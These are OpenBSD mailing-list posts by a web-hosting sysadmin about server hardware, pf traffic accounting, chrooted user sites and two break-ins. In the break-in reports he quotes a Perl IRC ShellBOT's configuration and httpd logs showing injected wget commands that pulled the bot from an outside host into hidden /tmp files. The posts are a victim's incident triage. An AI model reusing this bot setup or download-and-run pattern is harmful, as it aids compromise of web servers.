(INTELPremium ) cpu0 at mainbus0: apid 0 (boot processor) cpu0: apic clock running at 133 MHz cpu1 at mainbus0: apid 1 (application processor) cpu1: Intel(R) Pentium(R) D CPU 2.66GHz (GenuineIntel 686-class) 2.68 GHz cpu1: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,TM2,CNXT-ID mainbus0: bus 0 is type PCI mainbus0: bus 1 is type PCI mainbus0: bus 2 is type PCI mainbus0: bus 3 is type PCI mainbus0: bus 4 is type PCI mainbus0: bus 5 is type ISA ioapic0 at mainbus0: apid 2 pa 0xfec0, version 20, 24 pins pci0 at mainbus0 bus 0: configuration mode 1 (no bios) pchb0 at pci0 dev 0 function 0 Intel 82955X MCH rev 0x81 ppb0 at pci0 dev 28 function 0 Intel 82801GB PCIE rev 0x01 pci1 at ppb0 bus 4 ppb1 at pci0 dev 28 function 4 Intel 82801G PCIE rev 0x01 pci2 at ppb1 bus 3 em0 at pci2 dev 0 function 0 Intel PRO/1000MT (82573L) rev 0x00: apic 2 int 16 (irq 11), address 00:15:f2:c8:8e:10 ppb2 at pci0 dev 28 function 5 Intel 82801G PCIE rev 0x01 pci3 at ppb2 bus 2 CMD Technology SiI3132 SATA rev 0x01 at pci3 dev 0 function 0 not configured uhci0 at pci0 dev 29 function 0 Intel 82801GB USB rev 0x01: apic 2 int 20 (irq 10) usb0 at uhci0: USB revision 1.0 uhub0 at usb0 uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub0: 2 ports with 2 removable, self powered uhci1 at pci0 dev 29 function 1 Intel 82801GB USB rev 0x01: apic 2 int 17 (irq 10) usb1 at uhci1: USB revision 1.0 uhub1 at usb1 uhub1: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub1: 2 ports with 2 removable, self powered uhci2 at pci0 dev 29 function 2 Intel 82801GB USB rev 0x01: apic 2 int 18 (irq 3) usb2 at uhci2: USB revision 1.0 uhub2 at usb2 uhub2: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub2: 2 ports with 2 removable, self powered uhci3 at pci0 dev 29 function 3 Intel 82801GB USB rev 0x01: apic 2 int 19 (irq 5) usb3 at uhci3: USB revision 1.0 uhub3 at usb3 uhub3: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub3: 2 ports with 2 removable, self powered ppb3 at pci0 dev 30 function 0 Intel 82801BA AGP rev 0xe1 pci4 at ppb3 bus 1 vga1 at pci4 dev 1 function 0 ATI Mach64 GU rev 0x9a wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation) wsdisplay0: screen 1-5 added (80x25, vt100 emulation) ami0 at pci4 dev 2 function 0 Symbios Logic MegaRAID rev 0x01: apic 2 int 23 (irq 5) LSI 523 64b/lhc ami0: FW 713N, BIOS vG119, 64MB RAM ami0: 1 channels, 0 FC loops, 1 logical drives scsibus0 at ami0: 40 targets sd0 at scsibus0 targ 0 lun 0: AMI, Host drive #00, SCSI2 0/direct fixed sd0: 478736MB, 478736 cyl, 64 head, 32 sec, 512 bytes/sec, 980451328 sec total scsibus1 at ami0: 16 targets ITExpress IT8211F rev 0x11 at pci4 dev 4 function 0 not configured skc0 at pci4 dev 5 function 0 Marvell Yukon 88E8001/8003/8010 rev 0x13, Marvell Yukon Lite (0x9): apic 2 int 21 (irq 10) sk0 at skc0 port A, address 00:15:f2:c8:88:32 eephy0 at sk0 phy 0: Marvell 88E1011 Gigabit PHY, rev. 5 ichpcib0 at pci0 dev 31 function 0 Intel 82801GB LPC rev 0x01: PM disabled
Re: New server
On 19 May 2006, at 20:59, Nick Guenther wrote: Would hardlinking /home into /var/www/home help? I don't know all the details of chroot so I don't know if this would work. The basic premise is that each user has a websites folder that all their sites are in. For example, we would have /home/testuser/ websites in a user's directory, and /var/www/sites/www.x.com in apache's chroot. Is it then possible to hard-link from the chroot into the home directory of the user, and that user still be able to access their files from a chrooted ftp server (such as the built-in one) or from an scp client? Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: Spamd stats
On 19 May 2006, at 21:28, Mike Spenard wrote: I'm looking for scripts to generate statistics off of /var/log/spamd If you don't mind using rrdtool to collate the information, I have some scripts here: http://vanhegan.net/software/ In the Misc section down the bottom, you'll find my php/rrd/spamd scripts. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: New server
On 19 May 2006, at 21:19, jared r r spiegel wrote: i made myself a seperate /var/www/htdocs/sitename partition and then make individual symlinks from ~someuser/public_html - thatpartition/someuser IIRC I can't write hard links across partitions, and /var and /home are on different partitions. On 19 May 2006, at 21:25, Daniel Ouellet wrote: Change your home directory to the /var/www, or may be link from home to var/www, not the reverse. Unfortunately, it's not just my home directory, it's that of about 80 users, some of whom have several websites. On 19 May 2006, at 21:30, Nick Guenther wrote: Well all a hardlink is is a second entry in the filesystem's tables pointing at the same place on disk. It seems it should work. Not when the hardlink spans partitions. On 19 May 2006, at 21:52, Daniel A. Ramaley wrote: When a user logs in, what would prevent them from accessing their files in /var/www/home/wherever by just using the cd command to change to that directory? Because no users will be getting shell access. Either they'll be in a chrooted FTP environment, or maybe a chrooted scp environment. Everyday users won't have shell access. Just make sure permissions on whatever they need to access in /var/ www/home/wherever are such that the users can change files and Apache can read files. The files will be owned by the user in question, as they are at the moment in each user's home directory. However, as has been pointed out before, symlinking directories isn't the way forward. On 19 May 2006, at 21:53, Matthew S Elmore wrote: This is how I approached the problem: Each user had a specified directory they could put files in, /var/ www/users/bob or whatever. I simply set the proper permissions on that directory and did this: # ln -s /var/www/users/bob /home/bob/public_html That would work, and I can softlink across partitions. The only downside to this is that we'd have to shut off FTP access and restrict users to scp access only, in order to allow them to follow the links. This poses the problem of educating a large number of non- technical people, the thought of which makes me shudder (not as much as having some script kiddie punch holes a non-chrooted php). Turning people over to scp/sftp has the downside of being non- chrooted, and ideally we'd liek to chroot as much as possible... Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
SFTP logging
Hi, There's a very nice file in /var/log called xferlog, which logs all the ftp connections and files that go in and out of my machine. Very handy. Is there a similar setup available for sftp? Is there a config directive I can tweak in sshd_config or other file? Can it be extended to scp as well? Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: PFlog
On 9 Apr 2006, at 18:55, Gaby vanhegan wrote: And the winner is: pmacct. The only problem here is that I'm running 3.6 and pmacct requires libpcap = 0.6, and 0.3 is what I have. I can't do an upgrade at the moment, there's too many variables, but if I were to build libpcap from source, would it clobber the version that's currently installed and break other programs? Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: PFlog
On 10 Apr 2006, at 17:29, Joachim Schipper wrote: The only problem here is that I'm running 3.6 and pmacct requires libpcap = 0.6, and 0.3 is what I have. I can't do an upgrade at the moment, there's too many variables, but if I were to build libpcap from source, would it clobber the version that's currently installed and break other programs? The OpenBSD libpcap is a pretty heavily hacked version - most should be in it. It appears to be missing the function pcap_open_dead(), so I presume the 3.6 libpcap version is a touch behind the 0.6 version that pmacct requires. Of course, that looks like it's time for a port. ;-) Or just go with pfflowd, or somesuch. I already had a nice little system setup using pmacct to dump data into an SQL db. It would seem that using pfflowd and flowd together could replace that part of the system, and the data analysis part remains the same. The only difference here is that pfflowd would capture traffic at the firewall stage, whereas pmacct captures it directly at the interface. A little more glue required, but it could be made to do the same job. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
PFlog
Hi, I'm trying to setup a system to account for the traffic that flows through the firewall by service (http, smtp, etc). I have had some success playing with tcpdump and pf logging but I can't quite work out what's going on. I have pf logging the traffic that I want to account for so /var/log/pflog is filling up nicely. Taking a few sample lines from the output of: # tcpdump -n -r /var/log/pflog 13:35:07.985465 220.135.151.10.1254 195.224.72.148.25: S 108231586:108231586(0) win 65535 mss 1300,nop,nop,sackOK (DF) 13:35:08.384197 195.224.72.148.59258 195.224.72.2.53: 28701+[|domain] 13:35:15.747376 24.198.33.0.3395 195.224.72.148.25: S 531328580:531328580(0) win 64240 mss 1460,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK (DF) 13:35:18.025285 80.62.253.137.4452 195.224.72.148.80: S 3580612744:3580612744(0) win 65535 mss 1452,nop,nop,sackOK (DF) 13:35:28.544158 131.165.205.101.1886 195.224.72.148.80: S 2587435678:2587435678(0) win 16384 mss 1460 (DF) 13:35:29.585572 66.154.102.108.53139 195.224.72.148.80: S 1452108063:1452108063(0) win 5840 mss 1460,sackOK,timestamp 142976852 0,nop,wscale 0 (DF) 13:35:38.090762 82.153.166.67.1436 195.224.72.148.80: S 1406992321:1406992321(0) win 65535 mss 1452,nop,nop,sackOK (DF) I can't actually work out which field in these lines is the size of the data payload for each packet. The first line, looks like an SMTP connection, the last four look like HTTP connections (incoming). I've read the pflog documentation, and the tcpdump documentation but perhaps I've missed something. If I want to get packet sizes, I need to run tcpdump on the live interface (not the pflog file) with the -e flag, which, as the manual suggests: Link Level Headers If the -e option is given, the link level header is printed out. On Eth- ernets, the source and destination addresses, protocol, and packet length are printed. Which gives me packet length. However, this is for all traffic, and I'm only interested in traffic that makes it through pf, or traffic that I specifically want to log via pf. I have looked at tools like symon/symux (which I'll be using for the data logging), I don't want to run ntop and iplog hasn't been touched for years. The mailing archive suggested IPAudit, but I'd rather use native tools if I can. Does I have to listen to the interface directly (tcpdump -n ip) or can I get the packet size information from the pflog file? Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: PFlog
On 9 Apr 2006, at 14:10, Andrew Veitch wrote: Would pmacct help in this scenario? http://www.pmacct.org/ Not sure whether it could be configured to listen to pflog though. The thing with pflog is that I can't see which field (if any) is the packet size, which is what I'm interested in. I'm trying to log how much of which protocol eats what amount of my bandwidth, both inbound and outbound. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: PFlog
On 9 Apr 2006, at 15:26, Stuart Henderson wrote: The thing with pflog is that I can't see which field (if any) is the packet size, which is what I'm interested in. I'm trying to log how much of which protocol eats what amount of my bandwidth, both inbound and outbound. Are the 'pfctl -sr -v' counters no use for you? These look very promising indeed. I'm guessing that this: -s rules Show the currently loaded filter rules. When used together with -v, the per-rule statistics (number of evaluations, packets and bytes) are also shown. Note that the ``skip step'' optimization done au- tomatically by the kernel will skip evaluation of rules where possible. Packets passed statefully are counted in the rule that created the state (even though the rule isn't evaluated more than once for the entire connection). Means that all the bytes are counted, even for stateful connections? So if the first x bytes of an HTTP connection create the state, and a further Y bytes of web page are transmitted over that connection, then the total bytes field will show X+Y, rather than just X? Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: PFlog
And the winner is: pmacct. This one is really quick and simple to put together, five minutes and a configuration file later and I'm logging all traffic on all ports in 10 minute time slices, broken down by source, destination, MAC, port, etc. It also contains actual amounts of traffic too, so I can see how much is going in and out. It's also logging to MySQL so I can fiddle about with producing nice reports as much as I would like, probably using this tool: http://www.maani.us/charts/index.php I also realise that traffic that doesn't get through the firewall has still made it to my machine, and has gone over my interface, and thus I will be accountable for that traffic. If it's an SMTP connection that's tarpitted by spamd, it's still bytes that I'm accountable for. Thanks to everybody who replied for your good suggestions, Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
LSI Raid Card
Hi, If I got one of these: http://www.lsilogic.com/products/megaraid/sata_150_4.html Which is supported under the ami driver, and that I'll have four drives in RAID 5, each in these: http://www.ebuyer.com/customer/products/index.html? action=c2hvd19wcm9kdWN0X292ZXJ2aWV3product_uid=99222 Am I still going to be able to use the nice blink functions in bioctl? I'd like to know which drive my RAID card thinks has died... Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: LSI Raid Card
On 29 Mar 2006, at 17:46, Jon Simola wrote: On 3/29/06, Gaby vanhegan [EMAIL PROTECTED] wrote: Am I still going to be able to use the nice blink functions in bioctl? I'd like to know which drive my RAID card thinks has died... You'd have to get a backplane with safte or ses that the card can talk to. The drive enclosures you linked to are dumb sleds. They do have activity lights, so you could always perform some heavy drive activity and, by a process of elimination, the one without the blinking activity light is the failed drive. I thought that this might be the case. A backplane of some sort is totally outside my budget. I'll just have to carefully label and wire up the drives in their 'sleds' :) They do have two lights, one for power and one for drive activity. I was just wondering if the activity light could be reached by bioctl. On 29 Mar 2006, at 18:01, Per-Olov Sjvholm wrote: I think it should work with a command like bioctl -b channel:target.lun ami0. If its not in an enclosure it will tell... Try man bioctl When I get my sweaty little hands on the card, I'll give that a try. On 29 Mar 2006, at 18:03, Marco Peereboom wrote: You show me a SATA drive that has an LED first :-) Fair point. The caddy does claim to have a light, but if bioctl only talks to SAFTE enclosures and backplanes for this sort of thing, it's not usable for this purpose. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
DRAV vs iLo
Who wins in the OpenBSD world? DRAC (Dell Remote Admin Card) or iLo (HP's Integrated Lights Out)? We're looking at new servers and are wondering if these are worth the cash, or which is the one to go for? Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Security tools
Hi, I'm running 3.6 (yes, due for an upgrade) and I keep getting hit by some hackers that are using a bug I can't track down to download perl scripts into /tmp: [EMAIL PROTECTED] 11:26]# cd /tmp/ [EMAIL PROTECTED] 11:26]# ls -lFa total 76 drwxrwxrwt 2 root wheel512 Mar 15 12:21 ./ drwxr-xr-x 22 root wheel512 Jun 29 2005 ../ -rw-r--r-- 1 www wheel 0 Mar 14 22:14 .alekspwned2 -rw-r--r-- 1 www wheel 0 Mar 14 20:41 .balum -rw-r--r-- 1 www wheel 0 Mar 13 22:36 .mladen3 -rw-r--r-- 1 www wheel321 Mar 14 20:41 alekshah -rw-r--r-- 1 www wheel320 Mar 14 20:41 alekshah2 -rw-r--r-- 1 www wheel 3589 Mar 14 22:14 alekspwned -rw-r--r-- 1 www wheel 19309 Mar 14 22:14 alekspwned2 I have lots of suspicious activity in /var/www/log/error_log: 0 193090 12220 0 1222 0 0:00:15 --:--:-- 0:00:15 1222 0 193090 41420 0 4142 0 0:00:04 0:00:01 0:00:03 8414 100 19309 100 193090 0 19309 0 0:00:01 0:00:01 --:--:-- 17258 % Total% Received % Xferd Average Speed TimeTime Time Current Dload Upload Total Spent Left Speed 0 35890 12240 0 1224 0 0:00:02 --:--:-- 0:00:02 1224 100 3589 100 35890 0 3589 0 0:00:01 --:--:-- 0:00:01 2309k Can't open perl script /tmp/.alekspwned: No such file or directory.Use -S to search $PATH for it. % Total% Received % Xferd Average Speed TimeTime Time Current Dload Upload Total Spent Left Speed 0 35890 12240 0 1224 0 0:00:02 --:--:-- 0:00:02 1224 100 3589 100 35890 0 3589 0 0:00:01 --:--:-- 0:00:01 384k Can't open perl script /tmp/.alekspwned: No such file or directory.Use -S to search $PATH for it. % Total% Received % Xferd Average Speed TimeTime Time Current Dload Upload Total SpentLeft Speed 0 35890 12240 0 1224 0 0:00:02 --:--:-- 0:00:02 1224 100 3589 100 35890 0 3589 0 0:00:01 --:--:-- 0:00:01 461k Amongst other things, quite a few: Can't open perl script /tmp/.mladen: No such file or directory.Use - S to search $PATH for it.Can't open perl script /tmp/.mladen: No such file or directory. Use -S to search $PATH for it.Can't open perl script /tmp/.mladen: No such file or directory.Use -S to search $PATH for it.Can't open perl script /tmp/.mladen: No such file or directory.Use -S to search $PATH for it. Can't open perl script /tmp/.mladen2: No such file or directory.Use -S to search $PATH for it.Can't open perl script /tmp/.mladen2: No such file or directory.Use -S to search $PATH for it. Can't open perl script /tmp/.mladen2: No such file or directory.Use -S to search $PATH for it. Can't open perl script /tmp/.mladen2: No such file or directory.Use -S to search $PATH for it. Can't open perl script /tmp/.mladen2: No such file or directory. Use -S to search $PATH for it. I believe they're exploiting a bug in apache to do remote execution of their code, which downloads something to /tmp (usually a script of some sort). They were previously using wget, so I modified that to log as much information is it could to a file, but this didn't yield anything useful. Now I see from the logs that they're using ftp and curl to download the files. As in intermediate fix, I have mounted /tmp noexec, but this is not an ideal solution, and I don't want to remove ftp and curl. I have installed snort (from ports) with the latest rules but this has not yielded much useful information. The latest attack did come up in the snort logs, as a double decoding attack. I found some data in the downloaded files that corresponded to a payload around the time of the attack. My questions are: 1. How do I find out their attack vector? I have had a nessus scan performed on the machine, but it did not present any security (I can supply on request). I've checked the security releases in security.html and there are no pertinent ones for httpd. Snort has provided little useful information (I can provide access to the snort logs if required). 2. If I can't stop them getting in, is there any way to observe what they're doing, or how they're doing it, so I can get a pointer to the hole. An upgrade is in the works, and right soon too, but I'd really like to know what's going on here. Some useful links: Nessus scan: http://vanhegan.net/openbsd/nessus.txt dmesg: http://vanhegan.net/openbsd/dmesg.txt httpd error_log: http://vanhegan.net/openbsd/error_log httpd access_log: http://vanhegan.net/openbsd/access_log pkg_info: http://vanhegan.net/openbsd/pkg.list i've run out of ideas here. Can you help? Gaby -- Junkets for
Re: php in cgi mode suphp missing(?) from packages
On 15 Mar 2006, at 21:39, Anon wrote: As OBSD is focused on security, it makes a lot of sense to me that OBSD would at least include the CGI version of PHP in its php-core packages, and preferably have a suphp package too. Ports are provided by the community, not by OpenBSD. OpenBSD provides a great framework for creating ports, but does not create the actual ports. If you want a port, join the ports mailing list on ports@openbsd.org Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
New dell server
Hi, I'm considering getting a Dell PowerEdge SC1420 SATA. We need a small, cheap server for hosting some websites and email. A dual PIII-733 generic server isn't cutting the mustard any more so it looks like it's time to spend money. Has anybody managed to get the CERC SATA raid controller running on 3.8 or 3.9-stable? Alternatively, where's the cheapest source of LSI SATA cards? Can I boot from a system installed on an LSI card? Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: New dell server
On 14 Feb 2006, at 20:18, Brandon Mercer wrote: Has anybody managed to get the CERC SATA raid controller running on 3.8 or 3.9-stable? Alternatively, where's the cheapest source of LSI SATA cards? Can I boot from a system installed on an LSI card? LSI cards, as has been talked to death in the archives, are GREAT cards, of course the work and boot properly. :-) Also, newegg usually has them at a good price. Brandon Unfortunately: http://www.newegg.com/Product/CustratingReview.asp?item=N82E16816118007 Looks like we'll be spending a bit more cash on this: http://www.newegg.com/Product/CustratingReview.asp?item=N82E16816118015 I'm intrigued by the comment: Although it will function in a PCI slot,the throughput is marginal even with 4 x 36 gig raptors in RAID 0. I was expecting at least 150 mbps transfer rates and Im only geting 80. Technical support was knowlegable and I didn't have to wait more than 5 minutes to talk to someone. The informed me that this card performs best in a 64 bit/100 mhz slot such as a server board. IMHO its price is not justified vs the performance in a 32 bit system The application we have for the server does not require heavy data- throughput, so this bottleneck wouldn't be too much of a problem, but if I can spend a few more quid on a different mobo to get double the speed, I'd like to. What am I looking for here, motherboards that will take a 64 bit CPU and have 100Mhz PCI slots? That's a PCI-X card, no? Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: Remove all password restrictions?
On 10 Jan 2006, at 07:12, Peter Bako wrote: How do I change this so I can use any generic password? While for this case I want to dumb down the rules, for other more exposed servers I would like to do the opposite so I really would like to know how/where to modify this. Although it complains about short/bad passwords, keep putting it in, it'll relent after the third or fourth attempt. Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
FreeBSD packages
Hi, I have a FreeBSD package that contains the networker backup software. I've made the software run on OpenBSD by installing the FreeBSD compat stuff. What I want to know is if there's a cleaner way to install the package, or if there's a way to convert a package to the OpenBSD package format. I've made packages before, so I think I can convert it to OpenBSD package if needs be. If there's any hints or tips about converting Free to OpenBSD packages, I'd be happy to listen. Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: FreeBSD packages
On 10 Jan 2006, at 17:36, Jasper Lievisse Adriaanse wrote: Well, it would be easier to just convert the port to an OpenBSD port, and then build the package on OpenBSD directly. This is what I'm thinking. It is a bunch of binaries that sit in a separate subfolder in /usr/local, some man pages and a bit of code to go into /etc/rc.local. No problems. Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
How did they get here?
To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173 i386. I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory. The files are: ### Microsoft Search Worm - by br0k3d ### # From the same author of LinuxDay Worm and other variants ### And: # ShellBOT # 0ldW0lf - [EMAIL PROTECTED] # - www.atrix-br.cjb.net # - www.atrix.cjb.net in /tmp/.cpanel and /tmp/.cpanel.tmp. Reading them through, they just look like IRC clients written in Perl that have some remote commands for DOS, and the likes. They connect to a chatroom and print some message or other. If anybody wants to have some fun, the main config block is: # IRC my @adms=(darkwoot, br0k3d, vipzen, Nandokabala); #nick dos administradores my @canais=(#gestapo); my $nick='ADOLFHITLER'; # nick do bot.. c o nick jah estiveh em uso.. vai aparece com um numero radonamico no final my $ircname = 'SSSA'; chop (my $realname = `uname -a`); $servidor='irc.agitamanaus.net' unless $servidor; #servidor d irc q vai c usadu c naum for especificado no argumento my $porta='6667'; #porta do servidor d irc My question is how did these files get into the machine. I have entries in the httpd error log that look like this: --05:10:47-- http://arnold.dvclub.com.hk/phpBB2/linuxday.txt = `/tmp/.cpanel' Resolving arnold.dvclub.com.hk... done. Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected. HTTP request sent, awaiting response... --05:10:57-- http:// arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt = `/tmp/.cpanel.tmp' Resolving arnold.dvclub.com.hk... done. Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed: Connection timed out. Retrying. --05:12:13-- http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt (try: 2) = `/tmp/.cpanel.tmp' Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK Length: 3,355 [text/plain] 0K ... 100% 468.05 KB/s 05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355] So something is clearly injecting a command into a script, and it is causing wget to run and fetch some files. There are more instances of the same thing, but they're all fetching a file from the same place (either .cpanel, .cpanel.tmp or .plesk). Because they're in the default Apache error log, the attacker must have hit a website on the machine that doesn't have an ErrorLog defined, or they hit the machine by IP instead of a hostname. I got a list of sites that have no error log (and would log to /var/www/ logs/error_log) and checked their transfer logs. None of them had any entries in them that correspond to any of the times on the wget entries, so I learn nothing from this. There are earlier entries as well, doing the same thing, but to a different site I'm going to do a bulk grep on all the web server logs to see if anything about wget turns up in any of them, and if I can then work out which script on which site is causing the problem. As far as I can tell, there is no damage, but there are some entries like these in the error logs: /tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A8080^44: not found /tmp/x44423[2]: 1?X89?8DT81^DP83??RQ??^A?: not found /tmp/x44423[4]: syntax error: `(' unexpected Am I right in thinking that these entries show somebody trying to run a Linux binary unsuccessfully? Good job I leave Linux emulation turned off... :) So, what's my next move? My daily/weekly security emails show nothing to be worried about, no changes to any system critical files or anything of that ilk. Where can I look for more information or clues? I know the machine is due for an upgrade, and that's next on my list. I would provide a dmesg but the machine has been up for a while with one full disk, so it's been pushed out of the end of the dmesg file. Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: How did they get here?
On 4 Jan 2006, at 15:51, Pete Vickers wrote: Standard advise is to reinstall the o/s (3.8 ? ;-) and then _data_ only from know good backup. You could use a boot cdrom dd off an image of the disk for later analysis if you want first. It seems that the files have been uploaded, but they haven't actually caused any damage, or even been run. Unfortunately, I don't have the resources to mount a full investigation. Grep'ing every httpd log on the machine has produced no more information, but the fact that the actual wget output was in the httpd logs leads me to think that was the way in. Is there some attack vector like php or such available on the machine ? maybe they used that to retrieve write the file? The messages in the log file indicate that they used some command injection in a script to call wget and download the files into /tmp. I'm fairly sure it was via a bad script, and I'm trying to locate which script was used, so far with no success. ... but access to /tmp is tricky from a chrooted httpd ! Legacy sites mean that we haven't tried to chroot apache yet. I think it's probably time to bite the bullet and get this done :) Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: How did they get here?
On 4 Jan 2006, at 16:05, eric wrote: I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory. The files are: Is this doing any A/V scanning? You have told us nothign about the host in question: is it an email gateway? DNS server? etc. It runs: - qmail/spamassassin-spamd/openbsd-spamd/rblsmtpd - stock apache/php 4.3.8 It does no AV scanning above and beyond what SpamAssassin provides. It does not run any DNS services. I outlined my reasons why I thought it was a php/cgi script problem, being that the messages were found in the default httpd error logs. Finally, here is a dmesg (thanks Josh :-) OpenBSD 3.6 (GENERIC.MP) #173: Fri Sep 17 12:52:31 MDT 2004 [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC.MP cpu0: Intel Pentium III (GenuineIntel 686-class) 601 MHz cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, MMX,FXSR,SSE real mem = 1073324032 (1048168K) avail mem = 972726272 (949928K) using 4278 buffers containing 53768192 bytes (52508K) of memory mainbus0 (root) bios0 at mainbus0: AT/286+(00) BIOS, date 07/15/99, BIOS32 rev. 0 @ 0xfdb50 apm0 at bios0: Power Management spec V1.2 apm0: AC on, battery charge unknown pcibios0 at bios0: rev 2.1 @ 0xf/0x1 pcibios0: PCI BIOS has 8 Interrupt Routing table entries pcibios0: PCI Interrupt Router at 000:07:0 (Intel 82371AB PIIX4 ISA rev 0x00) pcibios0: PCI bus #1 is the last bus bios0: ROM list: 0xc/0x8000 mainbus0: Intel MP Specification (Version 1.1) (INTEL440GX ) cpu0 at mainbus0: apid 0 (boot processor) cpu0: apic clock running at 100 MHz cpu1 at mainbus0: apid 1 (application processor) cpu1: Intel Pentium III (GenuineIntel 686-class) 601 MHz cpu1: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, SER,MMX,FXSR,SSE mainbus0: bus 0 is type PCI mainbus0: bus 1 is type PCI mainbus0: bus 2 is type ISA ioapic0 at mainbus0: apid 2 pa 0xfec0, version 11, 24 pins pci0 at mainbus0 bus 0: configuration mode 1 (no bios) pchb0 at pci0 dev 0 function 0 Intel 82443BX AGP rev 0x03 ppb0 at pci0 dev 1 function 0 Intel 82443BX AGP rev 0x03 pci1 at ppb0 bus 1 pcib0 at pci0 dev 7 function 0 Intel 82371AB PIIX4 ISA rev 0x02 pciide0 at pci0 dev 7 function 1 Intel 82371AB IDE rev 0x01: DMA, channel 0 wired to compatibility, channel 1 wired to compatibility wd0 at pciide0 channel 0 drive 0: ST380011A wd0: 16-sector PIO, LBA48, 76319MB, 156301488 sectors wd1 at pciide0 channel 0 drive 1: IBM-DPTA-372050 wd1: 16-sector PIO, LBA, 19574MB, 40088160 sectors wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 2 wd1(pciide0:0:1): using PIO mode 4, Ultra-DMA mode 2 pciide0: channel 1 disabled (no drives) uhci0 at pci0 dev 7 function 2 Intel 82371AB USB rev 0x01: apic 2 int 19 (irq 11) usb0 at uhci0: USB revision 1.0 uhub0 at usb0 uhub0: Intel UHCI root hub, class 9/0, rev 1.00/1.00, addr 1 uhub0: 2 ports with 2 removable, self powered Intel 82371AB Power Mgmt rev 0x02 at pci0 dev 7 function 3 not configured vga1 at pci0 dev 17 function 0 ATI Mach64 GP rev 0x5c wsdisplay0 at vga1: console (80x25, vt100 emulation) wsdisplay0: screen 1-5 added (80x25, vt100 emulation) xl0 at pci0 dev 18 function 0 3Com 3c905B 100Base-TX rev 0x30: apic 2 int 18 (irq 9), address 00:50:04:6a:2f:19 exphy0 at xl0 phy 24: 3Com internal media interface isa0 at pcib0 isadma0 at isa0 pckbc0 at isa0 port 0x60/5 pckbd0 at pckbc0 (kbd slot) pckbc0: using irq 1 for kbd slot wskbd0 at pckbd0: console keyboard, using wsdisplay0 pcppi0 at isa0 port 0x61 midi0 at pcppi0: PC speaker sysbeep0 at pcppi0 lpt0 at isa0 port 0x378/4 irq 7 lm0 at isa0 port 0x290/8: LM79 npx0 at isa0 port 0xf0/16: using exception 16 pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo pccom1 at isa0 port 0x2f8/8 irq 3: ns16550a, 16 byte fifo fdc0 at isa0 port 0x3f0/6 irq 6 drq 2 fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec biomask 0 netmask 0 ttymask 0 pctr: 686-class user-level performance counters enabled mtrr: Pentium Pro MTRR support dkcsum: wd0 matched BIOS disk 80 dkcsum: wd1 matched BIOS disk 81 root on wd0a rootdev=0x0 rrootdev=0x300 rawdev=0x302 WARNING: / was not properly unmounted apm0: disconnected Gaby -- Junkets for bunterish lickspittles since 